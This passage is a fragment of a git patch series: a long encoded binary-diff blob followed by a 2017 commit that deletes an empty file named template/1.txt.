zddKxIuo1E9hcoquMSnqrd2^gt6frHUU=ld&(Okqsy4q?p&H7a3WEWNuA7qp)^DSKr z)@U{H@OfrJrX_@DzOBIo5u*XfnOH(Y-|y4QMn;R-0B%8FqLO>tToSdWu^0TzE3-~D zOS?Faaumss6d7IcWifIH8S;4`#&X1SimmhqE0r!UretZ|g!PLgwSQGP( zZH;0acs<=>I7_fU+r?pPWgOGCnU_P1s3Z0&PuI1FEq1@X8mQidMzDA`q>P*};5po1iK*NDxZ&uZW%E#zB>DRW47b ze;&^I&lYDDzdfD5E^ZBH6=oD-UpOk3X^SwpzU}KTNjIF{3&?? zSt9#lP0^4)zWh^Uve<>daX;UkDBm+7R-u=zK6nS$TCjZQmsWaCQq2HZaZ(o#wT7v1vOP6a1c7ElVK6nR*N`GbyU_%;Yc zE`@pMLn;GHBw;u>g*2y-Qwev!f$|E-ijeJvrmQ5`n%4k1gMG+GrYm)5lf~AD|5gX3 zmj0Gw)A18%6Qzz7a*fk3fFGC_rH&RjtK{bV0(vdwXE%3Wj$O6Yj2B8BBQU1rD%+Va zbQ?S5np+pUe20ccE5JT(c?oPf<^yK}q_g}_kGJ#FV=EvGk+J7>|6sB39w0a!i-2~) zBNH5c>$n9_=N2>@ltSRU1PA#?(HhN^+oae8; z;0Zl})M&K;3oLEzAY9FbMK%o|hCUw-LKf#GEio`dO?EQ{|LrEXT^DE!G?@@(BDu^XKfm9vgFD~51Q=o~f(mI~?23kLMI+}(u)}D%k zE4f){YUMe-nj={tx!*j%p)g0w^O6DPbfDi)W$%yY$NQ1pJ4l5WX&i zO8RS^xWfSfk^FB2!}Jfs3~TB-Y;s`z-R$}%a-5~1UvFOvM_sG$PGf_1UeD2vhz(Ij zkzL5iHWqqgG96C@$7%r=*KutH@j6Wf$C_)hdHxZ(X8$!TCDV}2*55TGY)E&$IC|rZ zfGDjv&E{vq#&l?abrk4E2@Z$Hm45+l<5kz8!b}<14-TUzHUI<=hIL_L{oIFCWgCs) z4bw5!$6}G_bD=`C7Ma5f-YPdHyyYbx4*bx7&xi~5HM5yBJ9WX{q?}VI9?6gE0vfts zXSyG>UUqS$c0CtB5JL+#{uNx6yUI6_Wa*l2nQY83c)AXdMWLtZOz8_xp^~_Vs+aSMYJ@^!cL+*u3Epv~LO6T~+v9!xX(tW$8P0%A#-TeeL@r z0XwJCWSAK!T5!moDYFRj&%i^oX}I$=&Hb{fi3!`ikjkn`uhP1sDwcw&>zhVti(^Es zDy`uGd=i)=QTaIy&Gojsts?@;;CXWj+SHlesqaV(Q8Ik_SK*g8f%4+Hv<)-p04i7z z7~~@|f;j+Mr$8HSJ5|P6QJ@+57z%T;K)lXB|6DSy-?SgB9K6SXRZ{>Qg2Y6j_pnb- zKNWTdvk|N?FDyR&`qDN#$M$!Quglx>;`RMtYi%r#WaoDEblK|6e(jZ}4-89w;G&h| z9s@~e>KCal82fSzxqcrQpmJV;(h{+z^Lk~~A})aY-MaPtE$-<$)Hv=J2sjm!$cc2Z zSRzovFY|!A?|tzrb`}_k+%hiBIx%!p_=TW=hbpTk24i>%^xw3D9md$(7PAV5*G+K& zxFl)(zw{_|2ajcT`8416jN0@vl#O0KhxJ;k8{`}mHv=}j9*zon77FLmXdj1GkDWrK z*p)TTOLTJxIK$D?jt|aNTz|u*?|XSnYpN62R@^dDm`5Fk$hDYYG^{sel&_gJrnfAb zYalebmnUN@ru53qNMl0N@eyivHS-L@x&epgV~@a+nXf5mV_Ry^HN2xuI@{+S)dwFn z<`Oi0e*j3vGnC`?(CJKG{qdOtwM8D>p5_ve{5s=fpIsY2Mc*Imx15)s-v8hO$Hai> zdLd`mzNZb?^m^c@Tt>2+Z-Toxw=fyY2(O=*8k;Q0X-*6`=+j_Q%B1APa^33TjTzJs z=W^mQ3V1i(-eEL>zI$k6ZTqoX1aFJG=I1*lJljOPRdFbL^~OnGboK>)!!CY<{JTw{ zc(6V>^0%Z_|88gguOFeuaXlhNIyC5ZwooM_(Q@_zdn0B|9E z_r3O|giGe2Sc)rTnVYp1>QBJ+@o&G`uY=i4a|8+lUA;6QCY`Irm zXuo9w6NfyHLK8&sLmFD-oWm*nbe*do+0bT)Oe|V3(e4!a0Xz;LVs4HNH*_pc=tR-{ zHVzklcet{C6UJ$1fd~vT{PxXiQPGlsK7(9Ggz4D0=-E@cD(jCuH&fMhBT%iFK{qIx zmEwl4IOHTAhzISTWT+5d6URT2-xofggOHShSC7{_X8|6S&qqCM1=86@bP~$%sEM}Z zSz>Pnwhk!6&tg?{5I@&N%pp`MxqqTwZ@wa>@W7))@{UTJB?Fh%(bgzU?IWmexh~*O zcTC4nx7fSbMY2z!_NhvXYg#$gw*L4@9Z&UE*WP8DSv7iXp%!7XlPW}f_b12Z9 zTB{VrM}OZhW!LMwpn#?CR7L}v20YoW-u~yYC<#LY)j$j=nV5TZ`HCPo49r@G??{5T zS5y>(=`v8Ex|Qp6tz7YD?PK&Rvet%xzW%gB%n6^M}#%)A+Ms?$#Dz*GF}0Zz0w_kwG7CKW}Xw zt8-3vz#{=D4Y-goab8d{8* zO%booU)#3B5av{RI5O!nxDa6Zvu4=L-?6*AKHUhO3w{`@w1s#Zt2}E?-|<6zdY&;yH~UnR;DahRA)91WS*nF z4s+mD>geh=PfaYud?4)+hh`8SWcF^8coq)#(XkEM2ARU)X4;GBhjlO)q^C7{CRYDG zN+RsN{QR0F8$aQbvS&(c`0#>74wY7T;5C?uBK5A1-w@s2dTn{W!wxu(T)hce1v8xn z)%Bm~S%WDZu=%**VZjq+q^nk25~(*YKap_~cY~{}$aI&d#cHXp)u<4~pYMBi9P;r( zeC^tJy*Sk5oyE+<=iwrwJ3_y7bJ8lYkL7c{j(-5jidW3eV`#NfH^Vol5Co((7g`x)*WH?wMQ}R zD5Ej^r={JLi6G2mADw>%IiGo>uKeX&{CRns>MuF+&hTZ2$T&V=tGeEc0!u z5~sD3{3Y@Txf+E0j1~02n%x1=a4AWoX#GmK*3UMq2KZCvhwe3AqB)jmZY&}}unfVh zAwg?4UrbHXR`k92(kv!9B+S=Q`P`9Ld)LHms=@j-2`@s02#<0hT>UOEHnX7(6U$%X zft&iIIT!^(a&Yc9m*4f-TV2eTpX&kdD)ghS*~WA}#_u)~tEVuk27pakxqJS0*%Nr9 zmiUbRC26-ksSX0`vIUX}2w2KMGWS6!y~O@86BX zya19~+8{l&>P#_mlza9aaxM6>k21D&sdS=OLqn_ci(L?SAyjW32nR7w70!$jqigSoMZZ%a#_F&uR9PhI;$ zB{2gv^atdi`{k>5|6KNBY~ki|NTh+&iA{%kEv7XfvP8eJQt$*bCyeXF|L4V*MAZH< z24vD0Tq7Zw>Kcn2ZYBj=b^Q=Yb`oZLdQ{i<`|{CiSRu(~BT{?6cEz0s{ScRV`T7M;f@Ba_U&-(u%`F(ujI?5BLAqYfJ z*vmb0)*3r84q*@1&03+T`SMUKhfvj0gwT|VrJz6*(JWt?)f36Te`VBn@7Qx*p^y_Z zK22q~yv|GuJWcBcrBnII-BZcqR5*!hqW=c7!XnQO^|tU)zgHu-pn^u0M%_{hj<%P=b~?;u9D))FZGsoD6VuSOkUCvRU&sZpE_#THUt>DlIpOkz zEL2h_BfWA-%x7@k4WdV(fsW)hepoD=-@hL3A6&e-nQY|SEWwIWUkJ!D*IlPbA-VXJ zuMo>uQjV<1VpC8DR|KS9vSAu{~DYd1l5t{q+lUi69&f0ozJG~#* zRhP9**bGPx3*7*H&%hm0;~I@wDY{-4eUDF9Ht5-fT)JI!;CrB#S#rOr&0?G7j?M(E zQXOxIIK3%n79j*S-zt4Ua&iIRFgG&tqGN7B)&YJou){|2{dXG0nh`gAn22}SZhI{i zbO$w~ipD7!_oj*Huj3BIXt}z0gd36q7@hFVR&MIv$@4O)tp zQ$yk%Qtc?e#CUhEtT%7Ux1e;Be12Pcw0QcAR7o?*jCh$vQ9eJ%=3El+zaE^{ju!4B zetCI&I=2aKbZVNO9_@`DmKwrD$!(;VJEGW=MB4X`=mhd4B~*}rRh)BmN=!M$`1;+v z03ZvyXBB!s_a7EN=Nk=UpFPk$k;zFHikxkNGC%cFK>fCzUf*^xkP6vRU=a#$gQ3DKwPrQixg2?z_-A`M7dV@!ZC#)jUKu0^GD# z4qYsJenNM}UKz~#-_PP9fO*d_`Ck}*)DamjvxbJ;!vU>$0(t&9HS~Bvc#iaJg);(6exK$*Tco!kY>e#%&NJ6c|pcG-j~Co^yN1?$DS=yde$MiLbpa5=>X1*5tm4R_S4Ohiti!(RC?c3!D>#=+A4KNZy}X`a8<+CZ`rOIi+-~FoeH3+_S?~LW?o>{ zWf14-R{-LEStx5Y$3AAm@Q$eIl9qdFBE9r2&v4-UsRNUsE8p>LeNxL{TZMRrP%Qc32EJhlFEL^8{UuAzv^i78Um#d)v}WBY%mwtQy0 z0VZSjm^!iaY{(R;01WZh-()aj?0k#PHsZH;_T)*Z;3D}pBAYJC%C@8=23ntgg6{nT z*G?#Gec);8`1MqNiq|WY8v^~rayt@op1Dt$+)?Mh6q+D#f=|aXF!SN%P$H9tL}=1u zHi!dg->6rn2CncI?h~a+WEq)?PJB?hO;V2AfAMv`Vj;K4w|Q@oZ#-!?Jyf*19kVJ! zIkkwY0*k7)d?1_ZQgT2Q=JU_o@OKztH1mA@BMj;=Nw!Shyd3@O6F|;pjjr=mZ zqdzDn2{#;KLZXL(G&1p`#~u)=jKuf1P=l&27-LyE(d+{#MZrk0Srs)(_}Rd$lsU)= z2MqyXF;5gm{{DMuBr$lAw}aKwk!WnN4kaw2_Y6B1wf|8|i0_N4hnNH=bNAC*q)Xh6 zjDqh^n$Z%E^jbkR`>d@CspcC0?_lt(IsA_y=OGmPmAHV{E&3xJ?!9V~ch5iYJ*_r~x20T=yog78m>@3pyLVLrc{dG5y9 zOK>bT#my^Ie(fd(QV*9|)5?h%r;K-y-QH^HSEz85$~twIXBHekUYaf^tPSzH;KpXP z;B^`o&`|zHOGmVhTsAjuMys41IHz_u z!*C}bJ~20Tq2>^T#Rcy3G!dD8)dQ0Ep(+`+`SXt3@6cLmi9|*a-ASk?ytgoefQUZ=W>=Q<$qMPb4IPU%Y3M~Op1m4B6p}|;T?Mz37yv#b;z_F8~D0Eu9&l4^i4 z#U7K%G&z~MORA!jCfMpF`1o2iOO7$&In*L|)S&ehSbKcOW#N#TcgAbG&j; zRE)%Q_jgJ1KR#%P)!mxS{G}0F{QsRs*#AW%+T(v|1gi)0lo#nzn>dU&W=**3@nB8j zG7rGa-LU3-;YcP+4Z{^i!4`j$DD4YN2^=K z*a^6)5X4+N!Ljvn8&HDdOb@!ZjX?^CJp?HX#lzCO^*vhHtsrnG$~U}aurO(ptjEtn z^)%SWvuw9@CP?G{7lowq7hV&k4H03j$1A-DWgbIPXBt9Gk5c6^&7b)vNlljSB=S3S zws!;UE`6t15}54g?D`m#zGLV&P4!OaVrIrapBf7-IsddWi|kL>`G$Ye2cSw0T*Syv zX_d@RIgaSt}Ytwt!nMT+-2p3@woUjFF-0sqHesWT~VD8fjF)ud@Iu+Mvr zVtJ-;ZfNvovNf$(scvOjjG@-k=De$TB>ic#zS_)9g=D>w2xR$gv~2cPZ@WlvEk@-80oels}v>R(C5O`IiCAP>HK=`RvMAJ3EKv$ZEM zUB)S1AfX1M!k~ZihtMQW!QPDlBbOy>S%4nc3jKx;Zv?K-y-c15E#Uk5xu)p2pasTh zD>VgW&p|d5IV z`ta_U7dV2)cd!Q0(r(}ZGw3tkSn-_~ceH##(mN3ZL-?2g^%B`aMW^8@ugMkx$ueuR zEdXO1HB-Kn)@qr{`OYZd+4$`Y(>-W*bJzA_W|+*1yZiG?f;2J;6cp#N*mAOUYn#j} z18Vg?)ph?r$S^#(s|xF{M*{=>zmp-y|M6%h?H7g6wn=XhQ?;||?=26?q?b?nOW4#G zBOi_8P@`_wqA7`~MPOjT0yXrB)yl)uXw>Pbs;K7fnAMZwdyV*FlO6)g^3*w>US|BV zT~4g|_!nL4mV}mC^%GN?vnuF_P1;K2E401L+KY!I+wwba>sy!4u51x@sw4P!bxWYYX&2hWyCYkr#K%N_B*?U27h#1? z7_~9Gf*Qwb{Y2egwuEMtkK*aiY9wZFWWlUP=My#(m8ZbYpU2XT(Rqb4EY#o|#1#YY z6PpK8U)!?cs)te-3oME;5{G}^>9X0nCqHl&0{%kU9U}$9@9N$ldv+cYt%Ihhd`H%; z;{JQrCT~pt3qvBkU!bxML*if%mY@KB0(XRoYon6g>@}87ctT@ZpVckwLkJvR& zbU$`U){s5(Wah6VTlCJEO{k$c`&C12&61KMe{^U~&7MO_xJf~RHz^oBYy7?$Gx+o@ zn~u-aVB{ad%96KK$)va~ZYj39_3Gfw((mBqoslz9K|T+% z3=xP#LlZ}O5Py)STOw4o{P7*q*hRU4N;zctDm(8&^h2oF+Ljp3^^kHNEw$8x$ceZ9a`b{M>{7Ya+7`}{ctPGvFpCZOb^zxxo`AZm%QeuWh%LbUGbL0V>J>=NE{VhoOmNGpcb^ursNlZSdHQ>Ehr z26p6VAA3G^4EB^wKMzBfsFDQEUtIiZ4uOKca|xcmZAV> zTgn@LtI|3Tr5;8gk|m@WH{=ZA6?NV=+=_w7kMCH!BT8|c^xstykUvVi#RJ!Aj%;Y7 zq0nr#S(?`iEPN6!(nrJb5|Wi52b+vo`i&z2DmgPJO3_N0#`5-giBzMm6-Y8CO99mr zhYH**iuKjOyy)6}u?Bj%MK^A@W;V_%=f>Ks_!TPHt7N*aA#@dSnr*3#-u~w<2Dl{5 zr#7G(gk_60G047n5qXlI>LFngk&W1&g<%*32@u=+_hlqm%ZBD-TaO}jAm(km=dYJ* z?35UOmP=Stb4Y|sRpg<(lE|7jRt zge5WC!6DIN7o&&y=ILaqA8dtLS%$?35$@W-3dDzAHfU%Jkbn}hvzM-MNcFB zp{}u6-#yRxPEorKCV|TOm9S^M>R3MESfFW7^&`3}Ey5)UX<&IU)E7PrPTk}xU&E<( zsGb-yj_X3nY#aqM@08kFF7EfOnJ?zwT_IP`%~+cciQ&y}xZP~`Ej5kfpIvHud~Udw z+8-SUNAjOV>VC6UyBN}5@|IZ=zOcdEZ7@muQ z$J-QN_)i|3Kp_kaPaV-`q9EV zs#~4Ozg@ksEgBdM5Nics`_`sY zL$}#BlwE@hiI`ICtvjBc+wydxREBq!2H@Et6?Le~=w8yMDnwVWa-I1msehp3QLtk? zdfG-JMSkhhBi7I(mWFqGk$&5=v^b2P#?8C2KQGZ?ZGHY~|H4R`NMe;tuiVly6KX!5 zi1rJo^i}jF#44qgyI!x8UUt{$;^q0tEWVs2{)smC*7F_fv9+Vl3NDCj*P!0Q(#rC* z_rz2_FIB3%UOrRuW6_oT*6S3=7=^$zFd8W>9yg{|YyhX914bR*M%AHO*Gi>dzRaLZ zS-!6THFgO;Epgm2*N&y zGCjfP<#w-GbUCttRvUvec)lAOO{%S>ynl0TT^XZxeh@6LcDxtUuj508#XLi~rY5a8 zk$IlYo7h`&Y;qez$E=q@RP-{LMIUX@C)0lOrq782AZ0-rW;xDLLh+TK}Gr+`H#xePhl}3V<=t$Tc z85wcB8Kl8U@XePBraL*)oF0o$}N}sjb^aIQ`)UP?`X^BB&p!az63~! zuD<6m8asH(%XnIOx5x2I`znPIx$8kBBNk5~M7|UXLMWSh8TZ#ynB?jzo8qtDVw(#y zSaCOQu>g=3jFFn96$RoD)c8q}s6Yfka){n2rd$jY(jpvfe!p{D+?uiU_S4*HG32q= z9Mma@*!!RGtWoi`@DESs{7ARpy{P=Y3{5MgocVnSHG&g%vAeWs;i$Xbp+EZ;Vapf` z8%@5bU(md+o{A!>0D7QER7Ukn;Q%!?YeB9GwKr#wrvD3o=>SCk`r6(&o7Nt0lF;tE z! zJ;%=(uIVoV$$}Dr>az<|Z&KusG$*Pw- z(q&NCM&kQACg3mmv{W3OsZXxtbUI9qQf$3~XJ|Korak77Tp^X0PR4_OX-yks1+~wK z1dZq`Hio9@#S6aEih(A<)CuB5m=;d1)Gd}0w*K|?>d6z_F*qL`e0f!mvE$`z{@|kY zE^u;?=rGA@zw2Z4I~R;wc?y_^~*)rhYk5TKSs-S;UFn=+?RTN!@ZQ&T%xS_v;UG7vggAfuG z^f7FZ2#{-GN-|#jC^h1!c4LL{C@mr%B$D<32>an4?kr_8rq5?OO_Sxk$A#R<-&3yf z^~IF7r^cECFg9XH+oBbea_Q#!7sNdcO0*!NVx7^%<4lza8eW4|noZz0yuPR~Q@%SK zR$z>${s;#Y#3$Q)1_)=K6bSP;b2=UE#)`*C4MWAyG-+jYvW-SY<-w3I!n*<(d-zOi z2jdLQqI6!IDhV)~OO=NxzlxX%`eMv7vs;~eXmyzJjVP!9<7>_2E=uEco-3Mi7dO7O zAezL4uo}8yPWH1nn^Pl$EP{*GhK8R(7IL*B?^SqGtO5KJq>Ok}VQp)@X3osA7unxF zSnyt&ULCQWt$~vMIF|<9wCj9vI3Mc%*20l~dh^zw6QFKh7+SM{I#aI;4VYDgP&eCb zPpm7fmZl(W`Vv1OzwAQr;p+g{+Og?=xP#X2wG%`&aU7pw=gz)Ve}bGvrlU1)4Z3WgARsjVNssw!lN+$?`;T32O)%{Yh))kR z51zO0l9hM|u-GBBwTYa7hON#(&XTNVZpz7UEgR_dB|irD(GP}`T>*)dXscg z_F3mjd%mE98=au{e3j@(!aUox9@Q}J)ChBY8z~~sZH8$b#+5S#$3i%O*!NxnW6Y;6 zra%R0@VSe^cHvC^i8((Pb620KIJvs_$7bSdeg9G$KlnCovZD(zpXE_CPGTcT->%QE zCJ5FXJZcmNkU`#9M@xc~RA@qcjt?|qp6;QrrxuKvOOzhBq>zv+LU|J?SsJI{R?573HU zM%TvH(E5)pkH0?LTRyw$cf#dfGs1S4hT^2LoZX1RbQ|RWkngj^57T*gtwSJ7GA$Qsz(>uQwmyDs2vZrbAr0qoX zH-cY3ayw30!lJBQSO_LId|yr@ZTyOLVNA*QB_Filj9DQ<&7@gsp#knVh!`}fj9r?+ z)+{yORa?o2NRc+pWUF>mWAE3`<`gfJ^Pb5JT=524ohe5l!`RLHbj5ejZkvF1AY|;a zk42Pn0YZcd(TA(5xYKMKGUP1CZwSa@)UZrf9NL0mgE?j&>E6>zg`{J7Xo-* zT&T+vl%{CiIHlRfGE6;*v7HA&n2Vr|w(pG5#AW>=JN&XbRvoaU5!2bBRzC=ZL|T6d zFI77xL+0|awxKWmF212e5eBL~`mUH_?!y(K+6Womeyqsc)OMw+1}GkcC=|_Ju$;_P zFP_TP+(vk@`)w0tv%80RP_43kx)LW^RsT~qLrzZXeyry_mnUD+(s221&cEREdYmqe zuk7EtpP%qE`k~O~MdaWFwnS61cv8X$A7LTzSYvjw?ozw*`Q|$H5@*Ks21u50roxp< zt}o4#fM|1n4djHN8nE}Y4+OQQ?K$ZdI7Tewat8I&Rn0987xKcP960A92}F}OE(|%> zu=jCbV@hp^qidIrK4l0pAV*Tdd-0_{^o?C68N6?4CW9Z+hVv-7#R)Y0gfYPYuD`t2 zgs_zLo*JV~b8RB{WqZ*R6@E}uc%g0boybCN1I&X#cc#{md`VmX*9?#yl{!%x3*zF6 zzDj1CU$8j?W+g~eXmfc#%qY4I^(VbBx;TI3AN!-d+Q-yo-|f>F7!5r8qEyWf zcG7W%0k<`CUZg-kckQ{mFbPb-)jKTFhS9fZQfy=)sy-EB*E46A4D|t)y)J@g2sH%7 zU5(F?r2WGWW3$M^wR!m*FRtFxw_Gourw!j+&Z~%N^YFM|$v69jr(UleG-wC5z2zW@ z3x7qVO;j3N8BYoCKoPd+W_w;MN7m(uP6!Vg4*)OjGU)_iB+yJFM23yCnP+@Y#6gMd zow%e;|s1Rj@)M+D3Nejxf~$|x%xPW zc65ln7Bg`)0}YY#@9-n`+~PNf2;f&%ypMJ`5VqGyZ zt^344&K=U{JcYw>v_N3wklOe`Fy6N^!a_As*BBC8qKLW@TGfPQsuON8ZSm_i)F_?r z`Ia0X-&Icwxvw#;V1Q;tDR`(}T|2x+z$kYurpyzysxKQ~c5|>XGDKCicoGqoZ|Oe` z#I{l#UUgX_wA^BA$#k0a=aIi4bwL93W`12DNF{r^J!k#)&8&untO}(+n*dygCX7?< zV7=9BY4uE)eAP*u<}tue-YjXaexXu1JwK4$u{^HP9Bms;!_dj0??Pd8Mxd*f+hkvh8y~E=v5z7 zbGoQ#?M*7Af?oj$UY=w{?6q=YU?^>pjW*O}(5w-H2{(Iwj|Oc)X*EqM7e9*7tvkS8 zQniZ^5K^5=X=Oh=i7zWraUI3g&RRAbIut?EHVZ3LJFH$m2cT&ig_UU@+O3~+qG?-( zm8l<=3?H5rYHZjf_XJQA-%2cBq$*mH4J@Bnb&D1;&>fqrs>IZ0*LhcQTNoC!P{{@u znvAbIu~W*S_n4|{@^+Nv)9S@TsUx~)3_ow*C?I@uHHE$E$mG@L!+=l#$ELX>)O%rd zB|y8}73M>YmgFEbGYf^EFNtm4(h|19fJ`p(u4S=@h8VHdj3H{-ha<^&d^l(!PefWx z*b=@Jw!JbmtGuHfx>LHyE8bloTMi^h^j)G9KL$uX2iRu-SUm`T2~zqQ@(2WoX*h@- zcsk>2oGj*Y(nbuQNvyW*u&=SuBghNE9e3|eMGvrZ&Df<}G2WH2wbyF3O$w#fb~=Eb zPmC|G<|R^OAL%R$PekZj0`lq75hzK%XKs!~*dR4QqKM;P>nvTpv4z|ok%x#thqbbW zMCI~+p_*M+(9C|$U8~$XC|6HMES2#-B4?!PH6=$l-Nr%ah-{0*7%@LL*GlYojDpM}Sk9>t%pbbkz9^IBKo;_P?_bl*g zxOOtOXOn}X^4UPbATdi-D3^M;D3($m&7GP(cDHvwdUYpAJ%3Ao##`+TeE#qNedJKb z57O?*qTE-Ch_1YqxkexI_pleDirGSoH!rMGnP~c)J9-mS-z253e{!N%i?Ta4c*gu) zvNZJt@&fsr___|1B>fiaB6lO+H?}st&ZL7asLs@wI4UX8P4M00%X|4Wb7?OGl3E!a!xv6H^6t+v} zeR7`k`gBd9=w?W|=t^um7C5kJlBrFIaOWcHxib|0;w1RfNOcm}ObJQbyAO z4Nt}n>*Xa5ar`!yFTFJr2EJa7`3S7|`1bX*+$>87h`oAE2&KA0rHu5nUzFhmj|uNw z7uJ@`y3rs-k0#cwIR!aR5G64ewO&6=W!1-=$dVHMu?Yh+Zd0@5$`ZXX<(M}ZuWBx1 zE2fXt-5+TuhH#E0CC7`V10g^_%IX#a^24Rzu!r9dG2A6fSWg}uvvjnxv zZVtT~l)evZXgdijtV}Bj18y)tQSrbNLkpT)*pZ51E~!00SS4SE;s6 zf74cTW3L+{-gwL$>gERm4KBhchT?*+RCzgtIk6a#%95G0bqFVHgdj^{}m4%kZNwn!I}!VPtszv3h!a6{d+ zU!4wOC78w3ci7q`e*0c?kbAL&ZqcIrwKfL3EZJ(m0cCQJrp5WVXM6v~^#V*J)Tnx} zu#tA`mG4K8G-;@iTy%e=-DbnElT2_cQ%-D!!GNcLZ$;E$!v<(Pi zWo?t#qa92s*IQL0KbaKn0SCWuZl8o^^Y1?U-0Yt9lqaCX@i^>nR>8BTkqkdstQy$1 zk|gTBIQY@$|J0?mU^m34h=h!irZMfcnBqq}q^uJE}}IUM;*r6`B2 zy_io0-d)r7W{gfhkMtyh%Q&g|ib<*)?*re%4$~p~(Nlj)&e>{1N4j3Oc2-RY>FT|t zhk&r>C%vx{QKm&u!xlv_^@&|ereG#Y3}Hi%3l`*CjyN%1reH6}z}`W93a{!r_vmGA zn22YpJqyjYIfhP=fb(t3(B_GdcSNK0)Fknqz@>YiLbc zXp>WTySkWvt0<*%i?8_|RMDly@|ZLvnj!FV`(kYSG&8&4G8+S2em&D}-?FE5hA?TS z)N2mB2`oc%mQLsl0S|9aSYT>))4|!Zf?u6$)lj{=jzE^6$2t*DLW2e2^OgZ@xr}8C zn=_b*H|MkRB#gtvgV64D$&ZbGKfav~I#@>6gC5G3Ep9r@nV~N(c~-CG!hk&t>IS-c_a3=Jxo$bul}sO@Eie z@M5KQK&6Fd@#@Fk`g^=6mv3Q>v7q#{WZ~)6wpp@l*&O ztxU1j@`gl=-VJ)kne8?is>?xouzox*QX?}wf~VUbq-jNjHFkP>mhY4C$;7OJzk3u6 z%DyY3dd9h%uEehq&%Kf|#3IJXK$?R^{%ulgIR&8ryJrS+JNR(h$Qg*{9EM=SAypm? z&V&M*Q;4uhvK>hr;DSH0hHu@s$!rX~yq z#=>F5prhM%Zm9PxE<a}lN`;FTH8Gt@4$)O;-H5a=NckCc<5Vw+v*Ra{dtjSUk`vi8pIx0J**E+YS_qq! zs&5|^S&6-yyKT!w=fLkCif(t>H-f*;-H#rJ57B~>s5Z&FZ6|*FUi*mFY$jB3cGI@> zMdj&GmAw4Ycd4jl1fxoJXK_^9(3KC$dlEd(zj0k9?M~sa@CVGOg<(-LfKjK6)vTTG z9ynIDQ;_M#G7N$Bpa?gXl$E_G(-9sU>Xy9>VCoVLYlyi@9HZdc5Fr`z9+X%Sq*uTb zl4^=b%Y*=+i->e2du~IZ?4tGPmRT@zO5@#h*vn**?j&=c>5L~}e8zHgx&=vKQuIMb z?vaPw9sl7!v?tYGh*nnwm8F2$Cw|rBZci1=9Rlrz204D*y+#_EH42m3xf;f7B>3&J z3yE0&HV>;IdwL{E6H&X40+!KkX3$2|FB(NNCie#NuWEu_d=RoQDjHw#J6$ zhV=LUf4LjfWWvYqHYD7oCB?je4~u3uP%#)KONv29S8nhOTIo!k66(e?dtE7Ifu=!K zU8oqVyqlrmvXx;f09FtS)AE`UEeF{nql_;qB)YE>Rviu6TAX`j{rcvBYv=;DmdNic zFe0Xhc7Q{@0x^(hZ=Bs&ZSqGGvka_+uRcCAUUVEQ;aGk7;f>4sVLgn5Fycs$_4C@| zmjwp%H91dbRa4iX1D6&ef}yBYgIdoZctM(xs)}MIJHi-3X;D|8rnH{J7l@5S_oVS& z?=3_x-a4MGtWR_+ioS1CDK@BIVysv<^s;M*+YV1Y5tB9WhyD<*HUMVD%eN7&-Y*Cz z1;GYTCcRWW>vnPx?feV_2rYf@22=0Vim$}Xi3IoBN4Bil-omWACGl9h+pb|=b~52` z0A%X8Rlx{aeV;YuEG7@KpZ>j*1C>RNR=3%enbdi;eZy{P>_Ih0bF+`7GWO}9DYSOl zU6$eN*`yTNEFXvU^KRs32a6JU`W5Dvy~f-C!Mwv{k=Kw|*7l=NmSBw>GVeJ0Cn~A) z!oL)11Ru!IIfL|i1*3&VCXyHg@U+@7WIYjh1?rfhvn$)Y)|XSFh#r-i9%!nDPl^en z5ASri@g5@_FC8O%4}Zbk(ebjjgUbQla*-KPtJ5kSh4*%Iz@zyV{QCN<|GGoViILCP=)zlHc!Mw@l4ouB z$8Vt~SrJ%;yuyA`f2U&q(GSjiXZ1=cS-3OC+2xFT$}%W;vUp$c(vkKNNYmn<$NBIfg)E}}JVL_9^z!V0kpP(@a@ zUU}+R{MO(zrkJ#tRyP$3WgQ!mR^O6>K=zY%_N^bnk|={pjFbf~(DnWtJF{<)V^H@p7Yv8=uA-e_8#P1C!dP(Egzw0oo8wgi<@22Zk&A@jW)aHn##@**&zU8DsGixD;F687wK_#xo_iIbU`Q!>X3bIgu~G18 zdaSw~?dnpt;WOPmuK@~BcP4YCcnGV3BSqbQsbHs39UA~=Y%Jt^VG_YYTAGezss>g! zdX(YQvij4{2zmPNGH{;D1p~$}@TYwnr9qz zd6pRUnhx$GD<7A88zupRq|FCIs|-PSO$z9ONfZWlgGzpSaKp$#AJrcUTwh{$hA)+e zh%K!J^6gFDf&0ql2@3RvQSG=wGv^iZY3GFm@iM&ZjL4$WdCB50H#l95HpB~< zE8?1EJ)hy3`Eq6*I5Q(arcQfZ)b*52;0!%Eyj!~OYJQxSJ;pxwRtyB+MYjHs{;y8} z96Hvg5O>eek-Kdf_bp$_SXK*xBqIfM?RiN3-^;uJQTM*4coh8G{86)!JHd z_p?7a6ZqG`M7nO;5^}6sOE-n&FP4+n6>j4sxHF|EFmz2&h^yN`Wbz3Az*pzgW9g-^ z6aNrUAWdFlh%u_S6^Is}jxWW5kD^5Aos0oUQ3>!*aXB>Z!HO-@I>j!yl`+0>$QZFx z9(Nnz5=&ig%nh{6!&K`Qu0svqe8pz#CQCTO>?HK4=KdQH5Ks_I5CqYsRd0}S zQ19HQ?T?R-Tln{)eUDpUx>H>KtA#&H_&sjIQw_4w=YMJ9@hG4H6`%W~7a%pBgLh`w zznb`KDLUYx1g+gU;=QphX=ySov!px!oNxi0G|$AS>fUInmghB zf2gwn3;-@-@Bj$8E1L2X@RyPXz^4Oe)qgmh6aCle|67iIU=nbC^#_tOCJ^b@eGQbe z|Nb@yh63j;e}Fn*{el8#F$X39r$K!nm=gXXJQBqHds0+j9B|UZ2iySZ|AD&~n*sBH zGp;@GQYrrr-u;pSm4BGhr-}RdbNJu7doP6o#sO!PdBABh{ypwqSpxvXvIkt6;NRo!RT;oI z;0-wsxB`*C$K8t@fN{X;_Xk|CrM^Uv2E`Q>ksA4HzNkJga?E%fhQ^EaReUlzlkw(Y-1p&nbFv-*$7k7H7g ztxvvvcwwYF>l46WDUSH)__G6lHuLWe)5p!cH~C95k1qXTws_oPN74<%&lbylPP~4$ z_~#LL$bcP;4?{L>`m04?cOx(Xc!Byrn0@<;@atm#<8l=k2E0~#fIYYV%gXJg6a?hY RFDdT+n&Ch|1Z{qP`X6c+;vfJ3 literal 0 HcmV?d00001 From 25ff7f5fe167cc64653b575ff17fe0cf7fd8bfc1 Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 14:04:28 +0400 Subject: [PATCH 4/8] Delete 1.txt --- template/1.txt | 1 - 1 file changed, 1 deletion(-) delete mode 100644 template/1.txt diff --git a/template/1.txt b/template/1.txt deleted file mode 100644 index d00491f..0000000 --- a/template/1.txt +++ /dev/null @@ -1 +0,0 @@ 